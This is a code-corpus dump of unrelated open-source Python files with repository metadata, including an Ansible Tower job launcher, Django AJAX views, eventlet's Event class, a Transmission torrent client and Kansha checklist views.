#!/usr/bin/python # coding: utf-8 -*- # (c) 2017, Wayne Witzel III <wayne@riotousliving.com> # # This module is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This software is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this software. If not, see <http://www.gnu.org/licenses/>. ANSIBLE_METADATA = {'metadata_version': '1.0', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: tower_job_launch author: "Wayne Witzel III (@wwitzel3)" version_added: "2.3" short_description: Launch an Ansible Job. description: - Launch an Ansible Tower jobs. See U(https://www.ansible.com/tower) for an overview. options: job_template: description: - Name of the job_template to use. required: True job_explanation: description: - Job explanation field. default: null job_type: description: - Job_type to use for the job, only used if prompt for job_type is set. choices: ["run", "check", "scan"] default: null inventory: description: - Inventory to use for the job, only used if prompt for inventory is set. default: null credential: description: - Credential to use for job, only used if prompt for credential is set. default: null extra_vars: description: - Extra_vars to use for the job_template. Use '@' for a file. default: null limit: description: - Limit to use for the job_template. default: null tags: description: - Specific tags to use for from playbook. default: null use_job_endpoint: description: - Disable launching jobs from job template. default: False extends_documentation_fragment: tower ''' EXAMPLES = ''' - name: Launch a job tower_job_launch: job_template: "My Job Template" register: job - name: Wait for job max 120s tower_job_wait: job_id: job.id timeout: 120 ''' RETURN = ''' id: description: job id of the newly launched job returned: success type: int sample: 86 status: description: status of newly launched job returned: success type: string sample: pending ''' from ansible.module_utils.basic import AnsibleModule try: import tower_cli import tower_cli.utils.exceptions as exc from tower_cli.conf import settings from ansible.module_utils.ansible_tower import ( tower_auth_config, tower_check_mode, tower_argument_spec, ) HAS_TOWER_CLI = True except ImportError: HAS_TOWER_CLI = False def main(): argument_spec = tower_argument_spec() argument_spec.update(dict( job_template=dict(required=True), job_type=dict(choices=['run', 'check', 'scan']), inventory=dict(), credential=dict(), limit=dict(), tags=dict(type='list'), extra_vars=dict(type='list'), )) module = AnsibleModule( argument_spec, supports_check_mode=True ) if not HAS_TOWER_CLI: module.fail_json(msg='ansible-tower-cli required for this module') json_output = {} tags = module.params.get('tags') tower_auth = tower_auth_config(module) with settings.runtime_values(**tower_auth): tower_check_mode(module) try: params = module.params.copy() if isinstance(tags, list): params['tags'] = ','.join(tags) job = tower_cli.get_resource('job') lookup_fields = ('job_template', 'inventory', 'credential') for field in looku
p_fields:
try: name = params.pop(field) result = tower_cli.get_resource(field).get(name=name) params[field] = result['id'] except exc.NotFound as excinfo: module.fail_json(msg='Unable to launch job, {0}/{1} was not found: {2}'.format(field, name, excinfo), changed=False) result = job.launch(no_input=True, **params) json_output['id'] = result['id'] json_output['status'] = result['status'] except (exc.ConnectionError, exc.BadRequest) as excinfo: module.fail_json(msg='Unable to launch job: {0}'.format(excinfo), changed=False) json_output['changed'] = result['changed'] module.exit_json(**json_output) if __name__ == '__main__': main()
kobox/achilles.pl
src/static/fm/views.py
Python
mit
4,377
0.000457
# coding: utf-8 from django.views.generic import CreateView, UpdateView, DeleteView from django.http import HttpResponse, HttpResponseRedirect from django.template.loader import render_to_string from django.template import RequestContext from django.core.serializers.json import DjangoJSONEncoder from django.conf import settings try: import json except ImportError: from django.utils import simplejson as json class JSONResponseMixin(object): """ This is a slightly modified version from django-braces project (https://github.com/brack3t/django-braces) """ content_type = None json_dumps_kwargs = None def get_content_type(self): return self.content_type or u"application/json" def get_json_dumps_kwargs(self): if self.json_dumps_kwargs is None: self.json_dumps_kwargs = {} self.json_dumps_kwargs.setdefault(u'ensure_ascii', False) return self.json_dumps_kwargs def render_json_response(self, context_dict, status=200): """ Limited serialization for shipping plain data. Do not use for models or other complex or custom objects. """ json_context = json.dumps( context_dict, cls=DjangoJSONEncoder, **self.get_json_dumps_kwargs() ).encode(u'utf-8') return HttpResponse( json_context, content_type=self.get_content_type(), status=status ) class AjaxFormMixin(JSONResponseMixin): message_template = None def pre_save(self): pass def post_save(self): pass def form_valid(self, form): """ If the request is ajax, save the form and return a json response. Otherwise return super as expected. """ self.object = form.save(commit=False) self.pre_save() self.object.save() if hasattr(form, 'save_m2m'): form.save_m2m() self.post_save() if self.request.is_ajax(): return self.render_json_response(self.get_success_result()) return HttpResponseRedirect(self.get_success_url()) def form_invalid(self, form): """ We have errors in the form. If ajax, return them as json. Otherwise, proceed as normal. """ if self.request.is_ajax(): return self.render_json_response(self.get_error_result(form)) return super(AjaxFormMixin, self).form_invalid(form) def get_message_template_context(self): return { 'instance': self.object, 'object': self.object } def get_message_template_html(self): return render_to_string( self.message_template, self.get_message_template_context(), context_instance=RequestContext(self.request) ) def get_response_message(self): message = '' if self.message_template: message = self.get_message_template_html() return message def get_success_result(self): return {'status': 'ok', 'message': self.get_response_message()} def get_error_result(self, form): html = render_to_string( self.template_name, self.get_context_data(form=form), context_instance=RequestContext(self.request) ) return {'status': 'error', 'message': html} DEFAULT_FORM_TEMPLATE = getattr(settings, "FM_DEFAULT_FORM_TEMPLATE", "fm/form.html") class AjaxCreateView(AjaxFormMixin, CreateView): template_name = DEFAULT_FORM_TEMPLATE class AjaxUpdateView(AjaxFormMixin, UpdateView): template_name = DEFAULT_FORM_TEMPLATE class AjaxDeleteView(JSONResponseMixin, DeleteView): def pre_delete(self): pass def post_delete(self): pass def get_success_result(self): return {'status': 'ok'} def delete(self, request, *args, **kwargs): """ The same logic as in DeleteView but some hooks and JSON response in case of AJAX request """ self.object = self.get_object() self.pre_delete() self.object.delete() self.post_delete() if self.request.is_ajax(): r
eturn self.render_json_response(self.get_success_result()) success_url = self.get_success_url() return
HttpResponseRedirect(success_url)
LoRexxar/Cobra-W
web/index/apps.py
Python
mit
89
0
from django.apps import AppConfig class IndexConfig(AppConf
ig): name = 'web.index'
Evfro/fifty-shades
polara/tools/movielens.py
Python
mit
2,538
0.006304
import pandas as pd from requests import get from StringIO import StringIO from pandas.io.common import ZipFile def get_movielens_data(local_file=None, get_genres=False): '''Downloads movielens data and stores it in pandas dataframe. ''' if not local_file: #print 'Downloading data...' zip_file_url = 'http://files.grouplens.org/datasets/movielens/ml-1m.zip' zip_response = get(zip_file_url) zip_contents = StringIO(zip_response.content) #print 'Done.' else: zip_contents = local_file #print 'Loading data into memory...' with ZipFile(zip_contents) as zfile: zip_files = pd.Series(zfile.namelist()) zip_file = zip_files[zip_files.str.contains('ratings')].iat[0] zdata = zfile.read(zip_file) if 'latest' in zip_file: header = 0 else: header = None delimiter = ',' zdata = zdata.replace('::', delimiter) # makes data compatible with pandas c-engine ml_data = pd.read_csv(StringIO(zdata), sep=delimiter, header=header, engine='c', names=['userid', 'movieid', 'rating', 'timestamp'], usecols=['userid', 'movieid', 'rating']) if get_genres: zip_file = zip_files[zip_files.str.contains('movies')].iat[0] with zfile.open(zip_file) as zdata: if 'latest' in zip_file: delimiter = ',' else: delimiter = '::' genres_data = pd.read_csv(zdata, sep=delimiter, header=header, engine='python', names=['movieid', 'movienm', 'genr
es']) ml_genres = split_genres(genres_data) ml_data = (ml_data, ml_genres) return ml_data def s
plit_genres(genres_data): genres_data.index.name = 'movie_idx' genres_stacked = genres_data.genres.str.split('|', expand=True).stack().to_frame('genreid') ml_genres = genres_data[['movieid', 'movienm']].join(genres_stacked).reset_index(drop=True) return ml_genres def filter_short_head(data, threshold=0.01): short_head = data.groupby('movieid', sort=False)['userid'].nunique() short_head.sort_values(ascending=False, inplace=True) ratings_perc = short_head.cumsum()*1.0/short_head.sum() movies_perc = pd.np.arange(1, len(short_head)+1, dtype=pd.np.float64) / len(short_head) long_tail_movies = ratings_perc[movies_perc > threshold].index return long_tail_movies
BambooHR/rapid
rapid/master/controllers/api/upgrade_controller.py
Python
apache-2.0
1,295
0.002317
""" Copyright (c) 2015 Michael Bright and Bamboo HR LLC Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from flask import Response from rapid.lib.version import Version from rapid.lib import api_key_required from rapid.lib.utils import UpgradeUtil class UpgradeController(object): def __init__(self, flask_app): self.flask_app = flask_app def configure_routing(self): self.flask_app.add_url_rule('/api/upgrade/<path:version>', 'upgrade_master', api_key_required(self.upgrade_master), methods=['POST']) def upgrade_master(self, version
): worked = UpgradeUtil.upgrade_version(version, self.flask_app.rapid_config) return Response("It worked!" if worked else "It didn't work, version {} restored!".format(Version.get_version()), status=200 if worked else 5
05)
Secretmapper/updevcamp-session-2-dist
form/cgi-bin/lectures/simple/python.py
Python
mit
272
0
#!/usr/local/bin/p
ython3 import cgi print("Content-type: text/html") print(''' <!DOCTYPE html> <html> <head> <title>Python</title> </head> <body> <h1>Python</h1> <p>Python</p> <p>This is the article for Python</p> </body> </html> '
'')
openstack/oslo.service
oslo_service/tests/test_systemd.py
Python
apache-2.0
2,580
0
# Copyright 2014 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import os import socket from unittest import mock from oslotest import base as test_base from oslo_service import systemd class SystemdTestCase(test_base.BaseTestCase): """Test case for Systemd service readiness.""" def test__abstractify(self): sock_name = '@fake_socket' res = systemd._abstractify(sock_name) self.assertEqual('\0{0}'.format(sock_name[1:]), res) @mock.patch.object(os, 'getenv', return_value='@fake_socket') def _test__sd_notify(self, getenv_mock, unset_env=False): self.ready = False self.closed = False class FakeSocket(object): def __init__(self, family, type): pass def connect(fs, socket): pass def close(fs): self.closed = True def sendall(fs, data): if data == b'READY=1': self.ready = True with mock.patch.object(socket, 'socket', new=FakeSocket): if unset_env: systemd.notify_once() else: systemd.notify() self.assertTrue(self.ready) self.assertTrue(self.closed) def test_notify(self): self._test__sd_notify() def test_notify_once(self): os.environ['NOTIFY_SOCKET'] = '@fake_socket' self._test__sd_notify(unset_env=True) self.assertRaises(KeyError, os.environ.__getitem__, 'NOTIFY_SOCKET') @mock.patch("socket.socket") def test_onready(self, sock_mock): recv_results = [b'READY=1', '', socket.timeout] expecte
d_results = [0, 1, 2] for recv, expected in zip(recv_results, expected_results): if recv == socket.timeout: sock_mock.return_value.recv.side_effect = recv else: sock_mock.return_value.recv.return_value = recv actual = systemd.onready('@fake_socket', 1)
self.assertEqual(expected, actual)
sbadia/pkg-python-eventlet
eventlet/event.py
Python
mit
7,095
0.000423
from __future__ import print_function from eventlet import hubs from eventlet.support import greenlets as greenlet __all__ = ['Event'] class NOT_USED: def __repr__(self): return 'NOT_USED' NOT_USED = NOT_USED() class Event(object): """An abstraction where an arbitrary number of coroutines can wait for one event from another. Events are similar to a Queue that can only hold one item, but differ in two important ways: 1. calling :meth:`send` never unschedules the current greenthread 2. :meth:`send` can only be called once; create a new event to send again. They are good for communicating results between coroutines, and are the basis for how :meth:`GreenThread.wait() <eventlet.greenthread.GreenThread.wait>` is implemented. >>> from eventlet import event >>> import eventlet >>> evt = event.Event() >>> def baz(b): ... evt.send(b + 1) ... >>> _ = eventlet.spawn_n(baz, 3) >>> evt.wait() 4 """ _result = None _exc = None def __init__(self): self._waiters = set() self.reset() def __str__(self): params = (self.__class__.__name__, hex(id(self)), self._result, self._exc, len(self._waiters)) return '<%s at %s result=%r _exc=%r _waiters[%d]>' % params def reset(self): # this is kind of a misfeature and doesn't work perfectly well, # it's better to create a new event rather than reset an old one # removing documentation so that we don't get new use cases for it assert self._result is not NOT_USED, 'Trying to re-reset() a fresh event.' self._result = NOT_USED self._exc = None def ready(self): """ Return true if the :meth:`wait` call will return immediately. Used to avoid waiting for things that might take a while to time out. For example, you can put a bunch of events into a list, and then visit them all repeatedly, calling :meth:`ready` until one returns ``True``, and then you can :meth:`wait` on that one.""" return self._result is not NOT_USED def has_exception(self): return self._exc is not None def has_result(self): return self._result is not NOT_USED and self._exc is None def poll(self, notready=None):
if self.ready(): return self.wait() return notready # QQQ make it return tuple (type, value, tb) instead of raising # because # 1) "
poll" does not imply raising # 2) it's better not to screw up caller's sys.exc_info() by default # (e.g. if caller wants to calls the function in except or finally) def poll_exception(self, notready=None): if self.has_exception(): return self.wait() return notready def poll_result(self, notready=None): if self.has_result(): return self.wait() return notready def wait(self): """Wait until another coroutine calls :meth:`send`. Returns the value the other coroutine passed to :meth:`send`. >>> from eventlet import event >>> import eventlet >>> evt = event.Event() >>> def wait_on(): ... retval = evt.wait() ... print("waited for {0}".format(retval)) >>> _ = eventlet.spawn(wait_on) >>> evt.send('result') >>> eventlet.sleep(0) waited for result Returns immediately if the event has already occured. >>> evt.wait() 'result' """ current = greenlet.getcurrent() if self._result is NOT_USED: self._waiters.add(current) try: return hubs.get_hub().switch() finally: self._waiters.discard(current) if self._exc is not None: current.throw(*self._exc) return self._result def send(self, result=None, exc=None): """Makes arrangements for the waiters to be woken with the result and then returns immediately to the parent. >>> from eventlet import event >>> import eventlet >>> evt = event.Event() >>> def waiter(): ... print('about to wait') ... result = evt.wait() ... print('waited for {0}'.format(result)) >>> _ = eventlet.spawn(waiter) >>> eventlet.sleep(0) about to wait >>> evt.send('a') >>> eventlet.sleep(0) waited for a It is an error to call :meth:`send` multiple times on the same event. >>> evt.send('whoops') Traceback (most recent call last): ... AssertionError: Trying to re-send() an already-triggered event. Use :meth:`reset` between :meth:`send` s to reuse an event object. """ assert self._result is NOT_USED, 'Trying to re-send() an already-triggered event.' self._result = result if exc is not None and not isinstance(exc, tuple): exc = (exc, ) self._exc = exc hub = hubs.get_hub() for waiter in self._waiters: hub.schedule_call_global( 0, self._do_send, self._result, self._exc, waiter) def _do_send(self, result, exc, waiter): if waiter in self._waiters: if exc is None: waiter.switch(result) else: waiter.throw(*exc) def send_exception(self, *args): """Same as :meth:`send`, but sends an exception to waiters. The arguments to send_exception are the same as the arguments to ``raise``. If a single exception object is passed in, it will be re-raised when :meth:`wait` is called, generating a new stacktrace. >>> from eventlet import event >>> evt = event.Event() >>> evt.send_exception(RuntimeError()) >>> evt.wait() Traceback (most recent call last): File "<stdin>", line 1, in <module> File "eventlet/event.py", line 120, in wait current.throw(*self._exc) RuntimeError If it's important to preserve the entire original stack trace, you must pass in the entire :func:`sys.exc_info` tuple. >>> import sys >>> evt = event.Event() >>> try: ... raise RuntimeError() ... except RuntimeError: ... evt.send_exception(*sys.exc_info()) ... >>> evt.wait() Traceback (most recent call last): File "<stdin>", line 1, in <module> File "eventlet/event.py", line 120, in wait current.throw(*self._exc) File "<stdin>", line 2, in <module> RuntimeError Note that doing so stores a traceback object directly on the Event object, which may cause reference cycles. See the :func:`sys.exc_info` documentation. """ # the arguments and the same as for greenlet.throw return self.send(None, args)
canvasnetworks/canvas
website/drawquest/economy.py
Python
bsd-3-clause
1,765
0.007365
from canvas.exceptions import ServiceError, ValidationError from canvas.economy import InvalidPurchase from drawquest import knobs from drawquest.apps.palettes.models import get_palette_by_name, all_palettes from drawquest.signals import balance_changed def balance(user): return int(user.kv.stickers.currency.get() or 0) def _adjust_balance(user, amount): if amount >= 0: user.kv.stickers.currency.increment(amount) else: result = user.kv.stickers.currency.increment_ifsufficient(amount) if not result['success']: raise InvalidPurchase("Insufficient balance.") balance_changed.send(None, user=user) publish_balance(user) def publish_balance(user): user.redis.coin_channel.publish({'balance': balance(user)}) def credit(user, amount): _adjust_balance(user, amount) def debit(user, amount): _adjust_balance(user, -amount) def credit_first_quest(user): credit(user, knobs.REWARDS['first_quest']) def credit_quest_of_the_day_completion(user): credit(user, knobs.REWARDS['quest_of_the_day']) def credit_archived_quest_completion(user): credit(user, knobs.REWARDS['arch
ived_quest']) def credit_personal_share(user): credit(user, knobs.REWARDS['personal_share']) def credit_streak(user, streak): credit(user, knobs.REWARDS['streak_{}'.format(streak)]) def credit_star(user): user.kv.stickers_received.increment(1) credit(user, knobs.REWARDS['st
ar']) def purchase_palette(user, palette): if isinstance(palette, basestring): palette = get_palette_by_name(palette_name) if palette in user.redis.palettes: raise InvalidPurchase("You've already bought this palette.") debit(user, palette.cost) user.redis.palettes.unlock(palette)
daboross/cardapio
src/plugins/duckduck.py
Python
gpl-3.0
8,409
0.002259
# # Copyright (C) 2010 Cardapio Team (tvst@hotmail.com) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ## Duck Duck Go search plugin by Clifton Mulkey ## Adapted from the Google Search plugin class CardapioPlugin(CardapioPluginInterface): author = _('Cardapio Team') name = _('DuckDuckGo') description = _('Perform quick DuckDuckGo searches') url = '' help_text = '' version = '1.0' plugin_api_version = 1.40 search_delay_type = 'remote' default_keyword = 'duck' category_name = _('DuckDuckGo Results') category_icon = 'system-search' icon = 'system-search' category_tooltip = _('Results found with DuckDuckGo') hide_from_sidebar = True def __init__(self, cardapio_proxy, category): self.c = cardapio_proxy try: from gio import File, Cancellable from urllib2 import quote from simplejson import loads from locale import getdefaultlocale from glib import GError except Exception, exception: self.c.write_to_log(self, 'Could not import certain modules', is_error=True) self.c.write_to_log(self, exception, is_error=True) self.loaded = False return self.File = File self.Cancellable = Cancellable self.quote = quote self.loads = loads self.getdefaultlocale = getdefaultlocale self.GError = GError self.query_url = r'http://www.duckduckgo.com/?q={0}&o=json' self.search_controller = self.Cancellable() self.action_command = "xdg-open 'http://duckduckgo.com/?q=%s'" self.action = { 'name': _('Show additional results'), 'tooltip': _('Show additional search results in your web browser'), 'icon name': 'system-search', 'type': 'callback', 'command': self.more_results_action, 'context menu': None, } self.loaded = True def search(self, text, result_limit): # TODO: I'm sure this is not the best way of doing remote procedure # calls, but I can't seem to find anything that is this easy to use and # compatible with gtk. Argh :( # TODO: we should really check if there's an internet connection before # proceeding... self.current_query = text text = self.quote(str(text)) # Is there a way to get the result_limit in the init method # so we don't have to assign it everytime search is called? self.result_limit = result_limit query = self.query_url.format(text) self.stream = self.File(query) self.search_controller.reset() self.stream.load_contents_async(self.handle_search_result, cancellable=self.search_controller) def cancel(self): if not self.search_controller.is_cancelled(): self.search_controller.cancel() def handle_search_result(self, gdaemonfile=None, response=None): # This function parses the results from the query # The results returned from DDG are a little convoluted # so we have to check for many different types of results here result_count = 0; try: response = self.stream.load_contents_finish(response)[0] except self.GError, e: # no need to worry if there's no response: maybe there's no internet # connection... self.c.handle_search_error(self, 'no response') return raw_results = self.loads(response) # print raw_results parsed_results = [] if 'Error' in raw_results: self.c.handle_search_error(self, raw_results['Error']) return # check for an abstract section try: if raw_results['Abstract']: item = { 'name': raw_results['Heading'], 'tooltip': '(%s) %s' % (raw_results['AbstractSource'], raw_results['AbstractText']), 'icon name': 'text-html', 'type': 'xdg', 'command': raw_results['AbstractURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: pass # check for a definition section try: if raw_results['Definition']: item = { 'name': '%s (Definition)' % raw_results['Heading'], 'tooltip': '(%s) %s' % (raw_results['DefinitionSource'], raw_results['Definition']), 'icon name': 'text-html', 'type': 'xdg', 'command': raw_results['DefinitionU
RL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: pass # check for a related topics section try: if raw_results['RelatedTopics']: for raw_result in raw_results['RelatedTopics']: if result_count >= self.result_limit: break #some related topics have a
'Topics' sub list try: for result in raw_result['Topics']: if result_count >= self.result_limit: break item = { 'name': result['Text'], 'tooltip': result['FirstURL'], 'icon name': 'text-html', 'type': 'xdg', 'command': result['FirstURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: #otherwise the RelatedTopic is a single entry item = { 'name': raw_result['Text'], 'tooltip': raw_result['FirstURL'], 'icon name': 'text-html', 'type': 'xdg', 'command': raw_result['FirstURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: pass # check for external results section try: if raw_results['Results']: for raw_result in raw_results['Results']: if result_count >= self.result_limit: break item = { 'name': raw_result['Text'], 'tooltip': raw_result['FirstURL'], 'icon name': 'text-html', 'type': 'xdg', 'command': raw_result['FirstURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: pass if parsed_results: parsed_results.append(self.action) self.c.handle_search_result(self, parsed_results, self.current_query) def more_results_action(self, text): text = text.replace("'", r"\'") text = text.replace('"', r'\"') try:
Elandril/SickRage
sickbeard/clients/transmission_client.py
Python
gpl-3.0
5,249
0.00362
# Author: Mr_Orange <mr_orange@hotmail.it> # URL: http://code.google.com/p/sickbeard/ # # This file is part of SickRage. # # SickRage is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # SickRage is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with SickRage. If not, see <http://www.gnu.org/licenses/>. import re import json from base64 import b64encode import sickbeard from .generic import GenericClient class TransmissionAPI(GenericClient): def __init__(self, host=None, username=None, password=None): super(TransmissionAPI, self).__init__('Transmission', host, username, password) if not self.host.endswith('/'): self.host = self.host + '/' if self.rpcurl.startswith('/'): self.rpcurl = self.rpcurl[1:] if self.rpcurl.endswith('/'): self.rpcurl = self.rpcurl[:-1] self.url = self.host + self.rpcurl + '/rpc' def _get_auth(self): post_data = json.dumps({'method': 'session-get', }) try: self.response = self.session.post(self.url, data=post_data.encode('utf-8'), timeout=120, verify=sickbeard.TORRENT_VERIFY_CERT) self.auth = re.search('X-Transmission-Session-Id:\s*(\w+)', self.response.text).group(1) except: return None self.session.headers.update({'x-transmission-session-id': self.auth}) #Validating Transmission authorization post_data = json.dumps({'arguments': {}, 'method': 'session-get', }) self._request(method='post', data=post_data) return self.auth def _add_torrent_uri(self, result): arguments = {'filename': result.url, 'paused': 1 if sickbeard.TORRENT_PAUSED else 0, 'download-dir': sickbeard.TORRENT_PATH } post_data = json.dumps({'arguments': arguments, 'method': 'torrent-add', }) self._request(method='post', data=post_data) return self.response.json()['result'] == "success" def _add_torrent_file(self, result): arguments = {'metainfo': b64encode(result.content), 'paused': 1 if sickbeard.TORRENT_PAUSED else 0
, 'download-dir': sickbeard.TORRENT_PATH } post_data = json.dumps({'arguments': arguments, 'method': 'torrent-add', }) self._request(method='post', data=post_data) return self.response.json()['result'] == "success" def _set_torrent_ratio(self, result): ratio = No
ne if result.ratio: ratio = result.ratio mode = 0 if ratio: if float(ratio) == -1: ratio = 0 mode = 2 elif float(ratio) >= 0: ratio = float(ratio) mode = 1 # Stop seeding at seedRatioLimit arguments = {'ids': [result.hash], 'seedRatioLimit': ratio, 'seedRatioMode': mode } post_data = json.dumps({'arguments': arguments, 'method': 'torrent-set', }) self._request(method='post', data=post_data) return self.response.json()['result'] == "success" def _set_torrent_seed_time(self, result): if sickbeard.TORRENT_SEED_TIME and sickbeard.TORRENT_SEED_TIME != -1: time = int(60 * float(sickbeard.TORRENT_SEED_TIME)) arguments = {'ids': [result.hash], 'seedIdleLimit': time, 'seedIdleMode': 1 } post_data = json.dumps({'arguments': arguments, 'method': 'torrent-set', }) self._request(method='post', data=post_data) return self.response.json()['result'] == "success" else: return True def _set_torrent_priority(self, result): arguments = {'ids': [result.hash]} if result.priority == -1: arguments['priority-low'] = [] elif result.priority == 1: # set high priority for all files in torrent arguments['priority-high'] = [] # move torrent to the top if the queue arguments['queuePosition'] = 0 if sickbeard.TORRENT_HIGH_BANDWIDTH: arguments['bandwidthPriority'] = 1 else: arguments['priority-normal'] = [] post_data = json.dumps({'arguments': arguments, 'method': 'torrent-set', }) self._request(method='post', data=post_data) return self.response.json()['result'] == "success" api = TransmissionAPI()
fcauwe/brother-scan
sendfile.py
Python
gpl-3.0
1,234
0.016207
#!/usr/bin/python import sys,os from email.Utils import COMMASPACE, formatdate from email.MIMEMultipart import MIMEMultipart from email.MIMEText import MIMEText from email.MIMEImage import MIMEImage from email.M
IMEImage import MIMEImage from email.MIMEBase import MIMEBase from email import Encoders import smtplib import XmlDict function=sys.
argv[1] user=sys.argv[2] filename=sys.argv[3] conf = XmlDict.loadXml("global.xml") for option in conf["menu"]["option"]: if ((option["type"].lower()==function.lower()) and (option["name"]==user)): option_selected = option msg = MIMEMultipart() msg['Subject'] = conf["subject"] msg['From'] = conf["source"] msg['To'] = COMMASPACE.join([option_selected["config"]]) msg['Date'] = formatdate(localtime=True) text = "Your scanner happely delivered this pdf to your mailbox.\n" msg.attach( MIMEText(text) ) part = MIMEBase('application', "pdf") part.set_payload( open(filename,"rb").read() ) Encoders.encode_base64(part) part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(filename) ) msg.attach(part) mailer = smtplib.SMTP(conf["smtp"]) #mailer.connect() mailer.sendmail(conf["source"],option_selected["config"] , msg.as_string()) mailer.close()
Reigel/kansha
kansha/checklist/view.py
Python
bsd-3-clause
7,405
0.003106
#-- # Copyright (c) 2012-2014 Net-ng. # All rights reserved. # # This software is licensed under the BSD License, as described in # the file LICENSE.txt, which you should have received as part of # this distribution. #-- from nagare import presentation, security, var, ajax from nagare.i18n import _ from comp import NewChecklistItem, ChecklistTitle, ChecklistItemTitle, Checklists, Checklist, ChecklistItem @presentation.render_for(NewChecklistItem) def render_ChecklistTitle_edit(next_method, self, h, comp, *args): """Render the title of the associated object""" text = var.Var(u'') with h.form(class_='new-item-form'): id_ = h.generate_id() h << h.input(type='text', value=text, id_=id_, placeholder=_(u'Add item')).action(text) with h.div(class_='btn-group'): h << h.button(h.i(class_='icon-checkmark'), class_='btn').action(lambda: comp.answer(text())) h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer) if self.focus: h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_)) self.focus = False return h.root @presentation.render_for(ChecklistTitle) def render_ChecklistTitle(self, h, comp, *args): """Render the title of the associated object""" h << h.i(class_='icon-list') kw = {} kw['style'] = 'cursor: pointer;display: inline;' kw['onclick'] = h.a.action(comp.answer).get('onclick').replace('return', "") with h.div(class_='text-title', **kw): content = self.text or h.span(_('Edit title'), class_='show_onhover') h << content return h.root @presentation.render_for(ChecklistTitle, model='edit') def render_ChecklistTitle_edit(next_method, self, h, comp, *args): """Render the title of the associated object""" text = var.Var(self.text) with h.form(class_='title-form'): id_ = h.generate_id() h << h.i(class_='icon-list') h << h.input(type='text', value=text, id_=id_, placeholder=_(u'Checklist title')).action(text) with h.div(class_='btn-group'): h << h.button(h.i(class_='icon-checkmark'), class_='btn').action(lambda: comp.answer(self.change_text(text()))) h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer) h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_)) return h.root @presentation.render_for(ChecklistItemTitle) def render_ChecklistTitle(self, h, comp, *args): """Render the title of the associated object""" return h.a(self.text).action(comp.answer) @presentation.render_for(ChecklistItemTitle, model='edit') def render_ChecklistTitle_edit(next_method, self, h, comp, *args): """Render the title of the associated object""" text = var.Var(self.text) with h.form(class_='item-title-form'): id_ = h.generate_id() h << h.input(type='text', value=text, id_=id_, placeholder=_(u'Checklist title')).action(text) with h.div(class_='btn-group'): h << h.button(h.i(class_='icon-checkmark'), class_='btn').action(lambda: comp.answer(self.change_text(text()))) h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer) h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_)) return h.root @presentation.render_for(Checklists, 'button') def render_Checklists_button(self, h, comp, model): if security.has_permissions('checklist', self.parent): with h.a(class_='btn').action(self.add_checklist): h << h.i(class_='ico
n-list') h << _('Checklist') return h.root @presentation.render_for(Checklists) def render_Checklists(self, h, comp, model): if security.has_permissions('checklist', se
lf.parent): # On drag and drop action = ajax.Update(action=self.reorder) action = '%s;_a;%s=' % (h.add_sessionid_in_url(sep=';'), action._generate_replace(1, h)) h.head.javascript(h.generate_id(), '''function reorder_checklists(data) { nagare_getAndEval(%s + YAHOO.lang.JSON.stringify(data)); }''' % ajax.py2js(action)) # On items drag and drop action = ajax.Update(action=self.reorder_items) action = '%s;_a;%s=' % (h.add_sessionid_in_url(sep=';'), action._generate_replace(1, h)) h.head.javascript(h.generate_id(), '''function reorder_checklists_items(data) { nagare_getAndEval(%s + YAHOO.lang.JSON.stringify(data)); }''' % ajax.py2js(action)) id_ = h.generate_id() with h.div(class_='checklists', id=id_): for index, clist in enumerate(self.checklists): h << clist.on_answer(lambda v, index=index: self.delete_checklist(index)) h << h.script("""$(function() { $("#" + %(id)s).sortable({ placeholder: "ui-state-highlight", axis: "y", handle: ".icon-list", cursor: "move", stop: function( event, ui ) { reorder_checklists($('.checklist').map(function() { return this.id }).get()) } }); $(".checklists .checklist .content ul").sortable({ placeholder: "ui-state-highlight", cursor: "move", connectWith: ".checklists .checklist .content ul", dropOnEmpty: true, update: function(event, ui) { var data = { target: ui.item.closest('.checklist').attr('id'), index: ui.item.index(), id: ui.item.attr('id') } reorder_checklists_items(data); } }).disableSelection(); })""" % {'id': ajax.py2js(id_)}) return h.root 